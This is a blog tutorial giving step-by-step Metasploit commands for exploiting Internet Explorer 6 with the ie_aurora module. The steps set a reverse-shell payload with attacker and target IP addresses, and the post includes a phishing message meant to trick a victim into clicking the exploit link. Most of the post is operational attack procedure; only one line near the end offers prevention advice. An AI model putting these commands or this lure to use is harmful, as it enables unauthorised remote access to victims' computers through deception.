• +
Exploiting Internet Explorer 6 to Gain Administrator Privilege Using ie_aurora.rb

Exploiting Internet Explorer 6 to Gain Administrator Privilege Using ie_aurora.rb

Bookmark

Type : Tutorial

Level : Medium, Advanced

For you who want to learn the easy way, you can see my tutorial about using this exploit using web based here.

This year will be end in a few weeks. I still remember at 2nd week of January of this year metasploit announce the new exploit for Internet Explorer 6 called ie_aurora memory corruption. Now when I live here in China, there's a lot of people still using Internet Explorer 6. I don't know why, maybe in my opinion all of the programmer here is very Windows minded. Yeah but that's not my problem, I just want to share the tutorial "Exploiting Internet Explorer 6 to Gain Administrator Privilege Using ie_aurora.rb".

Tools Needed :

1. Backtrack Linux

2. ie_aurora.rb  (Download From Mediafire.com)

Mediafire.com

Step By Step Exploiting Internet Explorer 6 to Gain Administrator Privilege Using ie_aurora.rb:

1. Download ie_aurora.rb then copy to /pentest/exploits/framework3/modules/exploits/windows/browser/, or simply do this command after you download it to your Backtrack desktop

cp ie_aurora.rb /pentest/exploits/framework3/modules/exploits/windows/browser/

2. Run your metasploit console /pentest/exploits/framework3/msfconsole

Exploiting Internet Explorer 6 to Gain Administrator Priviledge Using ie_aurora.rb

3. Use the ie_aurora exploit and then set your PAYLOAD (I'm using shell_reverse_tcp)

use exploit/windows/browser/ie_aurora

set payload windows/shell_reverse_tcp

Exploiting Internet Explorer 6 to Gain Administrator Priviledge Using ie_aurora.rb

4. The next step you must set the standard options for this exploit.

set RHOST 192.168.1.2

Define your target IP address(optional)

set SRVPORT 80

Listening port number in target computer(usually web application in port 80)

set URIPATH ProofOfConcept

This is how our link looks like (example : http://www.google.com/ProofOfConcept)

set LHOST 192.168.1.8

We must specify what is the address of our computer.

Exploiting Internet Explorer 6 to Gain Administrator Priviledge Using ie_aurora.rb

5. When we're finish set up all of the requirement, just run the exploit command.

Exploiting Internet Explorer 6 to Gain Administrator Priviledge Using ie_aurora.rb

6. Okay we've already finish, the exploit generate the new URL and it's already listening in local port 80. The next step is sending the URL to the target and make them click the link we've given to them.

Hi fellas, you want to see the great animations picture in your browser?just follow this link http://192.168.1.8/ProofOfConcept

Below is the picture when the victim click the link.

Exploiting Internet Explorer 6 to Gain Administrator Priviledge Using ie_aurora.rb

7. The browser will start to load but never complete, it means that the exploit already work. We also can see at our Backtrack box that someone has been trapped.

Exploiting Internet Explorer 6 to Gain Administrator Priviledge Using ie_aurora.rb

8. There's a new sessions created, so we can use the sessions. To list the active sessions, run sessions -l command. To interract with the session, just see the session ID at the left side, then run sessions -i 1.

Exploiting Internet Explorer 6 to Gain Administrator Priviledge Using ie_aurora.rb

and now we're already inside the victim computer console. 🙂

Prevention :

1. Update your browser regularly. This exploit cannot work in Internet Explorer 7 or newer

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com